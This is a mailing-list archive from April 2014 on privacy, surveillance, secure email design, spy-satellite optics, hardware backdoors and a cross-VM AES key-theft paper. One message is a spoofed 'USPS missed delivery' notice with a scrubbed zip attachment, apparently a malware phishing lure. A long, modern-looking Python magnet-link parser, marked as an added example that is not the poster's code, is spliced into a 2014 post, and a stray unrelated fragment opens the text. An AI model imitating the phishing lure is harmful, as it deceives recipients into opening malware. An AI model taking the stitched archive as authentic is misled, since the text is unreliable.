0. donning the skin of an earth human as camouflage - "Wearing an Edgar suit"
http://filmschoolrejects.com/features/meet-edgar-in-this-scene-we-love-from-men-in-black.php

From sdw at lig.net  Mon Apr 21 00:16:19 2014
From: sdw at lig.net (Stephen D. Williams)
Date: Mon, 21 Apr 2014 00:16:19 -0700
Subject: Does a society of sheep deserve a government of wolves?
In-Reply-To: <20140421025835.195d1c101054e63d426fa896@paranoici.org>
References: <20140419134510.GA3833@sivokote.iziade.m$>
    <1980426.dF0qtMjfnf@lap>
    <5353D5D4.2080107@cpunk.us>
    <10925020.WpicNprW44@lap>
    <20140421025835.195d1c101054e63d426fa896@paranoici.org>
Message-ID: <5354C5C3.3010001@lig.net>

On 4/20/14, 10:58 PM, Luther Blissett wrote:
> On Sun, 20 Apr 2014 17:38:08 +0200
> rysiek wrote:
>
>> On Sunday, 20 April 2014 09:12:36 Cypher wrote:
>>> On 04/20/2014 03:39 AM, rysiek wrote:
>>>> On Saturday, 19 April 2014 18:25:08 Cypher wrote:
>>>>> On 04/19/2014 08:45 AM, Georgi Guninski wrote:
>>>>>> The question is:
>>>>>>
>>>>>> === Does a society of sheep deserve a government of wolves?
>>>>> If we, who know better, don't help the sheep rise out of their
>>>>> bondage then we become the wolves.
>>>> Or get killed by the wolves, so that we can't help the sheep
>>>> anymore.
>>> That is a better fate than joining the feeding frenzy.
>> Still, I think we can put up a fight and try to do something about the wolves.
>>
> We sure can do something, but there may be some terribly failed attempts
> before we put some fire in the middle of the pack.
>

1) Be the enlightened humanist humans holding the wolves at bay. It's great
we can generate the most badass attack / defense military and police, but
they have to have boundaries and limits. Compared to various historical
precedents, they are effective and aren't terrible overall, but they do not
live up to the ideals that are appropriate now.

2) Uplift the sheep. The elites are failing the sheep, which isn't good for
anyone.
We've left it to those who have the responsibility, but many of them are
sheep too: shallow functionaries happy enough with the status quo and too
scared to fail worse to tinker. Elites (of a certain range: educated,
makers, hackers, thinkers, freethinkers) have the power to change the
world. That includes some who are now considered with the wolves in various
senses. A few smart people changed civil rights, etc. Don't assume that
everyone who is part of the system agrees with it. People are far more
pragmatic than that. Which generally includes not breaking laws, but can
include transparency, dialog, and moving toward improvement.

The greater population have the power to swarm the wolves in various ways,
if only they were knowledgeable, motivated, enabled, and led. Some progress
has been made, and there are plenty of chinks visible now. The trick is
informing, directing, and/or leading that potential energy through a
transformative path that is not more destructive than what you're trying to
cure. Sometimes it means letting groups make fools of themselves long
enough for everyone to get tired and aware enough to shun them for long
periods after. The end result of the "moral majority" minority and
religious / public power grab and related surge for social freedom/sexual
oppression was: free and open porn, negating of nearly all sexual blue
laws, momentum for same-sex civil rights, nearly complete change of
attitudes, dissipation of religion-in-government and general defeat of
religious fundamentalists, an educated liberal probably-atheist black
president, etc. They spent money and time defeating themselves,
permanently, and they don't even know why it happened. Sociopolitical judo.

On the other hand, for a long time Rove et al were frequently successful
reframing things with clever rebranding of terms: "death taxes" etc. What
is the equivalent for the things you care about? What are the key
embarrassing and enlightening missteps that would clarify the problem and
solution for your average sheeple? If it could be proved that some agency
knew about and used Heartbleed while knowingly exposing all of the world's
people and companies to compromise due to hoarding key information and
inaction, that might qualify.

sdw
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 4943 bytes
Desc: not available
URL:

From sdw at lig.net  Mon Apr 21 00:30:42 2014
From: sdw at lig.net (Stephen D. Williams)
Date: Mon, 21 Apr 2014 00:30:42 -0700
Subject: the Great Filter of private communication
In-Reply-To:
References:
Message-ID: <5354C922.5070708@lig.net>

Probably people just need two email clients: One for non-secure email,
another that only sends secure messages. They can both use imap for the
same account. Bonus: spam might potentially have a hard time getting
accepted as a secure sender, leaving secure email spam free. Alternately,
do it on viewing / editing via plugins that are less invasive and more
secure.

There are several problems:

Choosing an ID system: email address + key ID of some kind.

Key exchange / trust system: Hierarchical (do you trust some or all CAs?
Their signup policies?), web of trust (GPG or similar), personal signing,
etc.

Visibility and understanding: Current systems are annoying even for
experts. No hope of a normal user looking at or understanding the
ID/cert/key trust situation. Make it specific and simple: CA is safe but
could be coopted by TLA or mistakes, signup was weak (could have been a
stolen credit card), password could have been stolen, mitm exposure, etc.
Just draw the trust / exploit tree. Factor in multi-factor, alternate
channel checking, etc.

Ease of selecting, enabling, and using read/write interfaces. Solve the
problems of control, time available, ability to save for later safely.
Stephen

On 4/20/14, 10:55 PM, Scott Blaydes wrote:
> On Apr 20, 2014, at 7:05 PM, coderman wrote:
>
>> we have the maths! we have the technology!
>>
>> ... yet actual robust, private communications remain elusive.
>>
>> where the "Great Filter" thwarting our privacy codes?
>>
>> is it usability; anything more than invisibly automatic a failure?
>
> Yes. People keep claiming that it is just too hard to encrypt email. There are plugins for all platforms. If you can't send encrypted email, sending email in the first place is probably too difficult, just txt everyone on your fone. The smartfone has made for such stupid people that if it can't be done in just a few keystrokes (content included) then it is too hard or tl;dr.
>
> Remember the old days when there weren't PPP and SLIP connections? Before broadband. When a conversation on IRC was enjoyable, the right amounts of humor and actual thought? And you knew not to ask for help in #unix on efnet.
>
>> is it cost; anything more than zero too much to bear in the market?
>
> No, everyone can afford a smartfone nowadays.
>
>> is it correctness; anything less than a single mode always secure, broken?
>
> Life is full of levels of grey, and so is security. That password you use on new sites you don't trust vs your gpg/pgp passphrase. The sheeple don't have levels of grey with regards to security, either take it to their grave or everyone can see.
>
> Chatting with someone who was looking to start his own desktop Linux distro. I suggested an encrypted messaging platform over the security-hole-riddled platform he was using and he told me he had nothing to hide. I told him he wasn't the kind of person who should be developing anything security related.
>
> Security takes effort that people are not willing to expend.
>
>> perhaps all of these above, each a requisite element of robustness,
>> further compounding the difficulty of realizing an ideal.

--
Stephen D. Williams sdw at lig.net stephendwilliams at gmail.com
LinkedIn: http://sdw.st/in V:650-450-UNIX (8649) V:866.SDW.UNIX V:703.371.9362 F:703.995.0407 AIM:sdw Skype:StephenDWilliams Yahoo:sdwlignet
Resume: http://sdw.st/gres Personal: http://sdw.st facebook.com/sdwlig twitter.com/scienteer

From dan at geer.org Sun Apr 20 21:44:25 2014
From: dan at geer.org (dan at geer.org)
Date: Mon, 21 Apr 2014 00:44:25 -0400
Subject: NSA good guys
In-Reply-To: Your message of "Thu, 17 Apr 2014 19:02:11 -0300." <53504f61.04693a0a.602f.5a7e@mx.google.com>
Message-ID: <20140421044425.CE0C42280C9@palinka.tinho.net>

> http://ramitia.files.wordpress.com/2010/02/japan-face-masks.jpg

perhaps you would prefer this

http://www.bbc.com/news/blogs-news-from-elsewhere-27067012

--dan

From scott at sbce.org Sun Apr 20 22:55:43 2014
From: scott at sbce.org (Scott Blaydes)
Date: Mon, 21 Apr 2014 00:55:43 -0500
Subject: the Great Filter of private communication
In-Reply-To: References: Message-ID:

On Apr 20, 2014, at 7:05 PM, coderman wrote:
> we have the maths! we have the technology!
>
> ... yet actual robust, private communications remain elusive.
>
> where the "Great Filter" thwarting our privacy codes?
>
> is it usability; anything more than invisibly automatic a failure?

Yes. People keep claiming that it is just too hard to encrypt email. There are plugins for all platforms. If you can't send encrypted email, sending email in the first place is probably too difficult, just txt everyone on your fone. The smartfone has made for such stupid people that if it can't be done in just a few keystrokes (content included) then it is too hard or tl;dr.

Remember the old days when there weren't PPP and SLIP connections? Before broadband. When a conversation on IRC was enjoyable, the right amounts of humor and actual thought? And you knew not to ask for help in #unix on efnet.

> is it cost; anything more than zero too much to bear in the market?

No, everyone can afford a smartfone nowadays.

> is it correctness; anything less than a single mode always secure, broken?

Life is full of levels of grey, and so is security. That password you use on new sites you don't trust vs your gpg/pgp passphrase. The sheeple don't have levels of grey with regards to security, either take it to their grave or everyone can see.

Chatting with someone who was looking to start his own desktop Linux distro. I suggested an encrypted messaging platform over the security-hole-riddled platform he was using and he told me he had nothing to hide. I told him he wasn't the kind of person who should be developing anything security related.

Security takes effort that people are not willing to expend.

> perhaps all of these above, each a requisite element of robustness,
> further compounding the difficulty of realizing an ideal.

From lblissett at paranoici.org Sun Apr 20 22:58:35 2014
From: lblissett at paranoici.org (Luther Blissett)
Date: Mon, 21 Apr 2014 02:58:35 -0300
Subject: Does a society of sheep deserve a government of wolves?
In-Reply-To: <10925020.WpicNprW44@lap>
References: <20140419134510.GA3833@sivokote.iziade.m$> <1980426.dF0qtMjfnf@lap> <5353D5D4.2080107@cpunk.us> <10925020.WpicNprW44@lap>
Message-ID: <20140421025835.195d1c101054e63d426fa896@paranoici.org>

On Sun, 20 Apr 2014 17:38:08 +0200 rysiek wrote:
> On Sunday, 20 April 2014 09:12:36, Cypher wrote:
> > On 04/20/2014 03:39 AM, rysiek wrote:
> > > On Saturday, 19 April 2014 18:25:08, Cypher wrote:
> > >> On 04/19/2014 08:45 AM, Georgi Guninski wrote:
> > >>> The question is:
> > >>>
> > >>> === Does a society of sheep deserve a government of wolves?
> > >>
> > >> If we, who know better, don't help the sheep rise out of their
> > >> bondage then we become the wolves.
> > >
> > > Or get killed by the wolves, so that we can't help the sheep
> > > anymore.
> >
> > That is a better fate than joining the feeding frenzy.
>
> Still, I think we can put up a fight and try to do something about the wolves.

We sure can do something, but there may be some terribly failed attempts before we put some fire in the middle of the pack.

--
Luther Blissett

From jamesdbell9 at yahoo.com Mon Apr 21 12:52:32 2014
From: jamesdbell9 at yahoo.com (jim bell)
Date: Mon, 21 Apr 2014 12:52:32 -0700 (PDT)
Subject: Fw: NSA good guys
In-Reply-To: <1397934947.17049.YahooMailNeo@web126202.mail.ne1.yahoo.com>
References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140418020936.D82A62280DC@palinka.tinho.net> <1397865745.72147.YahooMailNeo@web126206.mail.ne1.yahoo.com> <1397929490.37026.YahooMailNeo@web126205.mail.ne1.yahoo.com> <20140419182746.GC2173@nl.grid.coop> <1397934947.17049.YahooMailNeo@web126202.mail.ne1.yahoo.com>
Message-ID: <1398109952.19376.YahooMailNeo@web126201.mail.ne1.yahoo.com>

From: jim bell
To: Troy Benjegerdes

> [I didn't get a bounce off of CP the first time]
>
>> Izvestia'.) An approximation I once heard is that a lens or mirror of about 4.5 inch in diameter can resolve an angle of one arc-second. A mirror of the size of the Hubble Space Telescope (which I assume approximates that of the typical spy satellite today) is about 20x larger, so the resolution should be 20x better, or 1/20 arc-second. That's 1/(57 degrees per radian)(3600 arcseconds per degree)(20) = 1/4,100,000 radian. From an altitude of 500 kilometers, that's about 1/8 of a meter, or 120 millimeter. Maybe that's a pixel-pair, but it's far too large to resolve the text on a newspaper.
>>
>> The best prospect to improve on this resolution would be to use a 'multiple-mirror-telescope' technology. Light-gathering capability isn't important in this application; high resolution is. Making a spy-telescope out of a few different mirrors, held precisely many meters apart, could conceivably achieve resolutions substantially greater than this.
>>    Jim Bell
>
> Such a mirror array would at some point reflect enough light at odd angles to be visible with the naked eye.
>
> I find it more likely that multiple-mirror-telescope tech would be implemented with a swarm of small satellites and extremely precise location tracking and a lot of signal processing later on.

I sure find that difficult to imagine! Particularly because the assemblage would presumably be flying at about 500 kilometers altitude, and would therefore be buffeted by extremely-small-but-significant orbital winds. In addition, the amount of information that would have to be interchanged (phase and amplitude, in TWO dimensions!) of an entire field of view would be phenomenal.

What I suspect the US military would really like to see is a spy satellite at geosync altitude (22,000 miles) with an apparent aperture of perhaps 150 meters, so that it has roughly the same resolution on the ground as existing fast-orbital spy satellites (orbital period circa 90 minutes or so).

Jim Bell

Curiously, I just saw this article:
(http://news.yahoo.com/us-military-developing-foldable-space-telescope-video-images-110058353.html)

The United States military's advanced research arm is working on a foldable space telescope that could image Earth in high resolution at a relatively low cost.

The Defense Advanced Research Projects Agency (DARPA) says the telescope design — known as the Membrane Optical Imager for Real-Time Exploitation, or MOIRE — would be of great use in geosynchronous Earth orbit, the spot 22,000 miles (35,000 kilometers) up where most telecommunications satellites reside.

"Membrane optics could enable us to fit much larger, higher-resolution telescopes in smaller and lighter packages," Lt. Col. Larry Gunn, MOIRE program manager, said in a statement.

"In that respect, we're 'breaking the glass ceiling' that traditional materials impose on optics design," Gunn added. "We're hoping our research could also help greatly reduce overall costs and enable more timely deployment using smaller, less expensive launch vehicles."

MOIRE is now in Phase 2 of development since work began in 2010. When this phase is completed, a 16-foot (5 meters) prototype of the telescope's mirror should be completed for ground testing. No space missions have been set for MOIRE yet, DARPA officials said.

There are both advantages and disadvantages to the MOIRE design. The membrane is not as efficient as the usual glass, but it is lighter — which allows prime contractor Ball Aerospace & Technologies Corp. to make larger lenses to increase the telescope's efficiency. DARPA estimates that a membrane system should weigh 86 percent less than a more traditional system of the same resolution and mass.

Most telescopes either reflect light (using mirrors) or refract it (using lenses), but MOIRE's behaves differently. Each membrane will instead diffract light using a piece of equipment known as a Fresnel lens.

"It is etched with circular concentric grooves like microscopically thin tree rings, with the grooves hundreds of microns across at the center down to only 4 microns at the outside edge," DARPA officials said in a statement. "The diffractive pattern focuses light on a sensor that the satellite translates into an image."

If the design ever reaches orbit, DARPA envisions the membrane stretching to 66 feet (20 meters) in diameter — about eight times the diameter of the Hubble Space Telescope and more than three times bigger than the mirror for NASA's huge James Webb Space Telescope, which is scheduled to launch in 2018.

The membranes would ride to space as "petals" packed into a tight package about 20 feet (6 m) wide, small enough to fit on a rocket. These petals would then unfurl in orbit, and provide an estimated resolution of 3.3 feet (1 m).

Originally published on Space.com.
===============

From juan.g71 at gmail.com Mon Apr 21 11:01:58 2014
From: juan.g71 at gmail.com (Juan)
Date: Mon, 21 Apr 2014 15:01:58 -0300
Subject: NSA good guys
In-Reply-To: <20140421044425.CE0C42280C9@palinka.tinho.net>
References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140421044425.CE0C42280C9@palinka.tinho.net>
Message-ID: <53558739.89bc340a.1b27.4039@mx.google.com>

On Mon, 21 Apr 2014 00:44:25 -0400 dan at geer.org wrote:
>
> > http://ramitia.files.wordpress.com/2010/02/japan-face-masks.jpg
>
> perhaps you would prefer this
>
> http://www.bbc.com/news/blogs-news-from-elsewhere-27067012

Ha! That's colorful.
> --dan
>

From tpb-crypto at laposte.net Mon Apr 21 07:43:27 2014
From: tpb-crypto at laposte.net (tpb-crypto at laposte.net)
Date: Mon, 21 Apr 2014 16:43:27 +0200
Subject: Fw: NSA good guys
In-Reply-To: <1397934947.17049.YahooMailNeo@web126202.mail.ne1.yahoo.com>
References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140418020936.D82A62280DC@palinka.tinho.net> <1397865745.72147.YahooMailNeo@web126206.mail.ne1.yahoo.com> <1397929490.37026.YahooMailNeo@web126205.mail.ne1.yahoo.com> <20140419182746.GC2173@nl.grid.coop> <1397934947.17049.YahooMailNeo@web126202.mail.ne1.yahoo.com>
Message-ID: <1341207525.14841.1398091407602.JavaMail.www@wwinf8311>

> Message of 19/04/14 21:49
> From: "jim bell"
>
> From: Troy Benjegerdes
> To: jim bell
>
> > [I didn't get a bounce off of CP the first time]
> >
> > > Izvestia'.) An approximation I once heard is that a lens or mirror of about 4.5 inch in diameter can resolve an angle of one arc-second. A mirror of the size of the Hubble Space Telescope (which I assume approximates that of the typical spy satellite today) is about 20x larger, so the resolution should be 20x better, or 1/20 arc-second. That's 1/(57 degrees per radian)(3600 arcseconds per degree)(20) = 1/4,100,000 radian. From an altitude of 500 kilometers, that's about 1/8 of a meter, or 120 millimeter. Maybe that's a pixel-pair, but it's far too large to resolve the text on a newspaper.
> > >
> > > The best prospect to improve on this resolution would be to use a 'multiple-mirror-telescope' technology. Light-gathering capability isn't important in this application; high resolution is. Making a spy-telescope out of a few different mirrors, held precisely many meters apart, could conceivably achieve resolutions substantially greater than this.
> > >    Jim Bell
> >
> > Such a mirror array would at some point reflect enough light at odd angles to be visible with the naked eye.
> >
> > I find it more likely that multiple-mirror-telescope tech would be implemented with a swarm of small satellites and extremely precise location tracking and a lot of signal processing later on.
>
> I sure find that difficult to imagine! Particularly because the assemblage would presumably be flying at about 500 kilometers altitude, and would therefore be buffeted by extremely-small-but-significant orbital winds. In addition, the amount of information that would have to be interchanged (phase and amplitude, in TWO dimensions!) of an entire field of view would be phenomenal.
>
> What I suspect the US military would really like to see is a spy satellite at geosync altitude (22,000 miles) with an apparent aperture of perhaps 150 meters, so that it has roughly the same resolution on the ground as existing fast-orbital spy satellites (orbital period circa 90 minutes or so).
>
> Jim Bell

Balloons, that's what the military uses for high resolution imagery. And they are so good at staying aloft that not even with a .50 machine gun would you be able to down one. The only way to do that is to fly a drone nearby carrying some pounds of dynamite and fire it off.

From tpb-crypto at laposte.net Mon Apr 21 08:18:39 2014
From: tpb-crypto at laposte.net (tpb-crypto at laposte.net)
Date: Mon, 21 Apr 2014 17:18:39 +0200
Subject: Does a society of sheep deserve a government of wolves?
In-Reply-To: <10925020.WpicNprW44@lap>
References: <20140419134510.GA3833@sivokote.iziade.m$> <1980426.dF0qtMjfnf@lap> <5353D5D4.2080107@cpunk.us> <10925020.WpicNprW44@lap>
Message-ID: <111681235.16454.1398093519841.JavaMail.www@wwinf8311>

> Message of 20/04/14 18:12
> From: "rysiek"
>
> On Sunday, 20 April 2014 09:12:36, Cypher wrote:
> > On 04/20/2014 03:39 AM, rysiek wrote:
> > > On Saturday, 19 April 2014 18:25:08, Cypher wrote:
> > >> On 04/19/2014 08:45 AM, Georgi Guninski wrote:
> > >>> The question is:
> > >>>
> > >>> === Does a society of sheep deserve a government of wolves?
> > >>
> > >> If we, who know better, don't help the sheep rise out of their
> > >> bondage then we become the wolves.
> > >
> > > Or get killed by the wolves, so that we can't help the sheep
> > > anymore.
> >
> > That is a better fate than joining the feeding frenzy.
>
> Still, I think we can put up a fight and try to do something about the wolves.

Castrating the wolves would be a good start.

From grarpamp at gmail.com Mon Apr 21 19:45:18 2014
From: grarpamp at gmail.com (grarpamp)
Date: Mon, 21 Apr 2014 22:45:18 -0400
Subject: HW backdoors
Message-ID:

In your routers, in your cpu's, in your firmwares, in your shorts... magic packets are everywhere.

http://www.synacktiv.com/ressources/TCP32764_backdoor_again.pdf

From griffin at cryptolab.net Tue Apr 22 10:33:35 2014
From: griffin at cryptolab.net (Griffin Boyce)
Date: Tue, 22 Apr 2014 13:33:35 -0400
Subject: Fine grain Cross-VM Attacks on Xen and VMware (AES)
Message-ID: <4d480631ba7505e3c43b7bbe66c2e5e7@cryptolab.net>

'AES in a number of popular cryptographic libraries including OpenSSL, PolarSSL and Libgcrypt are vulnerable to Bernstein's correlation attack when run in Xen and VMware virtual machines, the most popular VMs used by cloud service providers.'
Abstract: http://eprint.iacr.org/2014/248
Paper: http://eprint.iacr.org/2014/248.pdf

So in a nutshell, if you want to steal a website's private keys, you can get an account on their hosting provider and at least have a shot at getting on the same physical server ;-)

~Griffin

From grarpamp at gmail.com Tue Apr 22 12:29:26 2014
From: grarpamp at gmail.com (grarpamp)
Date: Tue, 22 Apr 2014 15:29:26 -0400
Subject: Fw: NSA good guys
In-Reply-To: <20140419182746.GC2173@nl.grid.coop>
References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140418020936.D82A62280DC@palinka.tinho.net> <1397865745.72147.YahooMailNeo@web126206.mail.ne1.yahoo.com> <1397929490.37026.YahooMailNeo@web126205.mail.ne1.yahoo.com> <20140419182746.GC2173@nl.grid.coop>
Message-ID:

> Such a mirror array would at some point reflect enough light at odd angles to be visible with the
> naked eye.

Moot, the minute you drop some sat into orbit everyone knows it's there even if they don't yet know what it does. Some speculate at least the US uses angled optical/radar shields to hide the bulk of some crafts from ground/orbital view. Sounds like a lot of game for that, especially when aerospace industry spies could provide the same general infos.

> I find it more likely that multiple-mirror-telescope tech would be implemented with a swarm of small
> satellites and extremely precise location tracking and a lot of signal processing later on.

Seems really difficult to fly and calibrate. ie: would certainly need better than gps timing onboard each. Maybe 1km pyramid of four could range each other well enough, no idea. As Jim referenced, membranes and cheap rigid multi mirror systems may be better. Remember Hubble was scrap when launched, but given a reference image (or in its case, a grind pattern) corrected/adaptive optics fixed it into gold.

From grarpamp at gmail.com Tue Apr 22 13:00:38 2014
From: grarpamp at gmail.com (grarpamp)
Date: Tue, 22 Apr 2014 16:00:38 -0400
Subject: Fw: NSA good guys
In-Reply-To: <1341207525.14841.1398091407602.JavaMail.www@wwinf8311>
References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140418020936.D82A62280DC@palinka.tinho.net> <1397865745.72147.YahooMailNeo@web126206.mail.ne1.yahoo.com> <1397929490.37026.YahooMailNeo@web126205.mail.ne1.yahoo.com> <20140419182746.GC2173@nl.grid.coop> <1397934947.17049.YahooMailNeo@web126202.mail.ne1.yahoo.com> <1341207525.14841.1398091407602.JavaMail.www@wwinf8311>
Message-ID:

> Balloons, that's what the military uses for high resolution imagery. And they are so good at staying aloft that not even with a .50 machine gun would you be able to down one. The only way to do that is to fly a drone nearby carrying some pounds of dynamite and fire it off.

Blimps sure... restricted dynamite?, just sit on top and dump burning petrol, drill, cut, etc. Unless you get balloons that way on launch (high climb rate is hard to target), high altitude (weather/spy) balloons are not reachable by anything less than missiles. Small holes in anything will prohibit reaching station and/or limit hold time. Drones are just as good for most things, that's why everyone has them now, even you.

From blibbet at gmail.com Tue Apr 22 16:53:23 2014
From: blibbet at gmail.com (Blibbet)
Date: Tue, 22 Apr 2014 16:53:23 -0700
Subject: Novena needs crowdfunding help
Message-ID: <535700F3.4050508@gmail.com>

They're 70% there, Bunnie needs help with the rest.

http://www.bunniestudios.com/blog/?p=3750
http://www.crowdsupply.com/kosagi/novena-open-laptop

"$178,790 raised of $250,000 goal"

From service-notification at usps.gov Tue Apr 22 10:14:41 2014
From: service-notification at usps.gov ("USPS Express Services")
Date: Tue, 22 Apr 2014 17:14:41 +0000
Subject: USPS - Missed package delivery
Message-ID:

We attempted to deliver your item at 09:30 am on Apr 22th, 2014. The delivery attempt failed because nobody was present at the shipping address, so this notification has been automatically sent. You may arrange redelivery by visiting the link below or pick up the item at the U.S. Post Office indicated on the receipt. If the package is not scheduled for redelivery or picked up within 48 hours, it will be returned to the sender.

Label/Receipt Number: US2716808EU
Class: Package Services
Service(s): Delivery Confirmation
Status: eNotification sent

Print this label to get this package at our post office.

Thank you, © 2014 Copyright© 2013 USPS. All Rights Reserved.

*** This is an automatically generated email, please do not reply ***

-------------- next part --------------
A non-text attachment was scrubbed... Name: US2716808EU.zip Type: application/zip Size: 6471 bytes

From rdohm321 at gmail.com Tue Apr 22 10:56:30 2014
From: rdohm321 at gmail.com (Randolph)
Date: Tue, 22 Apr 2014 19:56:30 +0200
Subject: [cryptography] The next gen P2P secure email solution
In-Reply-To: References: Message-ID:

> This thread pertains specifically to the use of P2P/DHT models
> to replace traditional email as we know it today.

*Anonymous Email based on virtual institutions*

What about this model? In a network you send your public email encryption key to a "virtual institution". The institution is defined by a name (e.g. AES string) and postal address (e.g. hash key).
Having this information added to your node, all your email to you or from you will be stored in the virtual email provider institution. This detaches your node's IP and encryption key from the institution. That means care-of (c/o) institutions will be able to house 3rd-party e-mail without needing to distribute their own public keys.

To create a post office for your friends, two methods exist:

1) Define a common neighbor (e.g. Alice and Bob connect to a common webserver as node, and all three have email encryption keys shared), then the webserver stores the emails, even if Alice or Bob are offline.

2) Or/additionally: create a virtual institution and add the email key of a friend to your node. In case your friend adds the magnet link (which contains name and address of the virtual institution, aka AES key and hash key) for the institution as well to his node, the institution will save all emails for him (as well as from senders which are not registered at the virtual institution).

A magnet link allows sharing the virtual institution easily. The magnet URI would look like:
*magnet:?in=Gmail&ct=aes256&pa=dotcom&ht=sha512&xt=urn:institution*

With this method an email provider can be built without data retention and with the advantage of detaching email encryption keys from nodes' IP addresses. Next to TCP, you can use UDP and SCTP as protocol as well.

Virtual Institutions (VI) have been, according to the homepage, introduced by the lib-version 0.9.04 of the http://goldbug.sf.net email and chat application.

If we understand this right, now everyone can create an email provider without data retention just as a service for friends. In case in a network of connected nodes everyone uses "gmail" as VI-name and "dotcom" as VI-address, everyone will host everyone for email, while all remains encrypted. Could be a nice net or p2p model in a testing.
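The magnet link format in the post above, parsed and validated as an added example; this is not GoldBug's or the poster's own code. It assumes the parameter meanings implied by the sample link (in = institution name, ct = cipher type, pa = postal address, ht = hash type, xt = urn:institution), and the identifier() derivation is this example's own assumption, added to show why every node that shares the same name and address files mail under the same institution.

```python
"""Parser and validator for a virtual-institution magnet link.

Added example; not GoldBug's own code.  Assumed parameter names, taken from
the post's sample link: in (institution name), ct (cipher type), pa (postal
address), ht (hash type), xt (exact topic, must be urn:institution).
"""
import hashlib
from dataclasses import dataclass
from urllib.parse import parse_qs, quote, urlsplit

# The post's own sample link, used as the demo input below.
SAMPLE_LINK = "magnet:?in=Gmail&ct=aes256&pa=dotcom&ht=sha512&xt=urn:institution"

REQUIRED = ("in", "ct", "pa", "ht", "xt")
SUPPORTED_CIPHERS = {"aes256"}                      # only value the post shows
SUPPORTED_HASHES = {"sha256", "sha384", "sha512"}   # all exist in hashlib
INSTITUTION_URN = "urn:institution"


@dataclass(frozen=True)
class Institution:
    name: str        # "in": the AES string naming the institution
    cipher: str      # "ct"
    address: str     # "pa": the postal address (hash key)
    hash_type: str   # "ht"

    def identifier(self) -> str:
        """Opaque key a node can file care-of mail under (assumed derivation):
        hash of name and address with the link's own hash type.  It depends on
        nothing but the institution, so the post office never needs the
        recipient's IP or encryption key; two nodes with the same name and
        address therefore share one mailbox, the effect the post describes."""
        h = hashlib.new(self.hash_type)
        h.update(self.name.encode("utf-8"))
        h.update(b"\x00")  # separator so ("ab", "c") != ("a", "bc")
        h.update(self.address.encode("utf-8"))
        return h.hexdigest()

    def to_magnet(self) -> str:
        """Re-emit the link in the post's parameter order, percent-encoding
        the free-text fields so '&' or '=' inside a name cannot smuggle in
        extra parameters."""
        return "magnet:?in=%s&ct=%s&pa=%s&ht=%s&xt=%s" % (
            quote(self.name, safe=""), self.cipher,
            quote(self.address, safe=""), self.hash_type, INSTITUTION_URN)


def parse_institution_magnet(uri: str) -> Institution:
    """Parse a magnet link; raise ValueError on anything malformed."""
    parts = urlsplit(uri)
    if parts.scheme != "magnet" or parts.netloc or parts.path:
        raise ValueError("not a magnet URI")
    # strict_parsing rejects empty pairs such as "a=1&&b=2"
    params = parse_qs(parts.query, keep_blank_values=True, strict_parsing=True)
    unknown = set(params) - set(REQUIRED)
    if unknown:
        raise ValueError("unknown parameters: %s" % sorted(unknown))
    values = {}
    for key in REQUIRED:
        if key not in params:
            raise ValueError("missing parameter: %s" % key)
        if len(params[key]) != 1:   # a repeated key is ambiguous: reject it
            raise ValueError("duplicate parameter: %s" % key)
        values[key] = params[key][0]
    if values["xt"] != INSTITUTION_URN:
        raise ValueError("xt must be %s" % INSTITUTION_URN)
    if values["ct"] not in SUPPORTED_CIPHERS:
        raise ValueError("unsupported cipher: %s" % values["ct"])
    if values["ht"] not in SUPPORTED_HASHES:
        raise ValueError("unsupported hash: %s" % values["ht"])
    if not values["in"] or not values["pa"]:
        raise ValueError("institution name and address must be non-empty")
    return Institution(values["in"], values["ct"], values["pa"], values["ht"])


def is_valid_institution_magnet(uri: str) -> bool:
    """Boolean wrapper for callers that only need accept/reject."""
    try:
        parse_institution_magnet(uri)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    inst = parse_institution_magnet(SAMPLE_LINK)
    print(inst)
    print("identifier:", inst.identifier())
    print("round trip ok:", inst.to_magnet() == SAMPLE_LINK)
```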
From hannes at mehnert.org Tue Apr 22 11:48:27 2014
From: hannes at mehnert.org (Hannes Mehnert)
Date: Tue, 22 Apr 2014 20:48:27 +0200
Subject: [liberationtech] Programming language for anonymity network
In-Reply-To: <5350E1BD.5010304@mpi-sws.org>
References: <5350E1BD.5010304@mpi-sws.org>
Message-ID: <5356B97B.5000308@mehnert.org>

Hey,

On 04/18/2014 10:26, Stevens Le Blond wrote:
> We are a team of researchers working on the design and
> implementation of a traffic-analysis resistant anonymity network
> and we would like to request your opinion regarding the choice of a
> programming language / environment. Here are the criteria:

I'm a researcher with some experience in formal methods (http://itu.dk/people/hame) and also software development (https://github.com/hannesm) in different kinds of programming languages.

> 1) Familiarity: The language should be familiar or easy to learn
> for most potential contributors, as we hope to build a diverse
> community that builds on and contributes to the code.
>
> 2) Maturity: The language implementation, tool chain and libraries
> should be mature enough to support a production system.
>
> 3) Language security: The language should minimize the risk of
> security relevant bugs like buffer overflows.
>
> 4) Security of runtime / tool chain: It should be hard to
> inconspicuously backdoor the tool chain and, if applicable,
> runtime environments.

I actually question whether your criteria are extensive enough. Especially for crypto systems and anonymity systems, I'd want to have a proper specification of the protocol, either by writing it in a logic system or by using a declarative programming language.
In my experience, code with lots of shared mutable data (such as object-oriented and imperative programming) tends to produce usable applications quickly, but once you want to go multi-core/multi-threaded or extend at points not thought of upfront, the code becomes messy and really hard to maintain. Thus I'd go for some functional programming language where most of the time you write code which does not mutate the heap.

Another piece of thought is static typing vs dynamic typing. While the latter produces prototypes quickly, the former results in much more confidence that the application will actually do the right thing (again, static typing is not a replacement for testing).

Your fourth point can be mitigated by a) two compilers to cross-bootstrap [http://cm.bell-labs.com/who/ken/trust.html] and/or b) formalised and small runtimes.

For the time being I'd suggest looking into OCaml/Haskell/Erlang or Idris (if you need a really expressive type system), maybe writing specifications upfront in Coq/HOL/Lem. I don't see any reason these days to use C/C++ or another unsafe macro-assembly language (and I currently develop a TLS stack in pure OCaml to run with openmirage.org / be used by nymote.org).
Happy hacking,

Hannes

From tpb-crypto at laposte.net Tue Apr 22 11:58:50 2014
From: tpb-crypto at laposte.net (tpb-crypto at laposte.net)
Date: Tue, 22 Apr 2014 20:58:50 +0200
Subject: [cryptography] The next gen P2P secure email solution
In-Reply-To: References: Message-ID: <1538308832.40108.1398193110797.JavaMail.www@wwinf8228>

> Message of 22/04/14 20:30
> From: "Randolph"
>
> > This thread pertains specifically to the use of P2P/DHT models
